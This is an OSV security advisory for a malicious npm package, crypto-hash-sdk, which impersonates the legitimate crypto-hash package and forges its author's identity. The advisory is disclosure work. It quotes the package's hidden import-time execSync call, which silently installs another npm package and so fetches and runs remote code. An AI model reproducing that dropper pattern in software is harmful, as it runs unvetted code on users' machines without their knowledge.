MAL-2026-4541

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/crypto-hash-sdk/MAL-2026-4541.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4541

Published

2026-05-19T18:58:21Z

Modified

2026-05-26T06:02:26.123387769Z

Summary

Malicious code in crypto-hash-sdk (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (208571de648a5ef9d7b4ae7b6f83151d9c2272f75fc16b42faa75a352ded2e08)

Package name and metadata impersonate Sindre Sorhus's legitimate crypto-hash package (forged author Sindre Sorhus <sindresorhus@gmail.com> and repository sindresorhus/crypto-hash in package.json), but the shipped code differs. index.js (lines 73-78) contains a top-level IIFE that calls execSync("npm uninstall prettier-sdk && npm install prettier-sdk", { stdio: "ignore", windowsHide: true }) — on any require()/import of this module, the installer's machine silently runs npm install for the unrelated prettier-sdk package, pulling and executing arbitrary remote code (including any lifecycle hooks of that package) with stdio suppressed and errors swallowed. This is a dropper that fetches unpinned remote code at import time, layered on top of a typosquat with forged author identity.

Database specific

{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-26T05:50:17.512686283Z",
            "versions": [
                "1.0.1"
            ],
            "sha256": "208571de648a5ef9d7b4ae7b6f83151d9c2272f75fc16b42faa75a352ded2e08",
            "id": "IN-MAL-2026-003249",
            "source": "amazon-inspector",
            "modified_time": "2026-05-19T18:58:21Z"
        }
    ]
}

References

https://www.npmjs.com/package/crypto-hash-sdk/v/1.0.1

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / crypto-hash-sdk

Package

Name: crypto-hash-sdk; View open source insights on deps.dev
Purl: pkg:npm/crypto-hash-sdk

Affected ranges

Affected versions

1.*

1.0.1

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "25fd2657458826ba32009f8724d81609eefe4fb75aab7b6bb2a2da1232d7bd2c",
            "tlsh": "ef517166df3c822203b13a175ca5969fa43d91257e9058bb8d4cbf3820c706dc6783b6",
            "path": "index.js"
        },
        {
            "sha256": "ca43953d3010cc88ea556586b66d2a27b2686e8f6ed4518bd8e7dc87db60ff90",
            "tlsh": "0221e1139e2fb6a327e45dcd9c3d94d1a979800d848dd9ee9edb7100c2ec661105e68a",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-9fysDQ21e4wOncHvg/8TGKrvKWIvAqTeztx3S5SMUmFKWSM/oqc2Ss8FTRGydPAjnMvZtEwyqdNGVyYY6LUxKQ==",
                "sha1": "3522be61f9b960bddcb252122a3a3a21d4234bc1"
            },
            "filename": "crypto-hash-sdk-1.0.1.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/crypto-hash-sdk/MAL-2026-4541.json"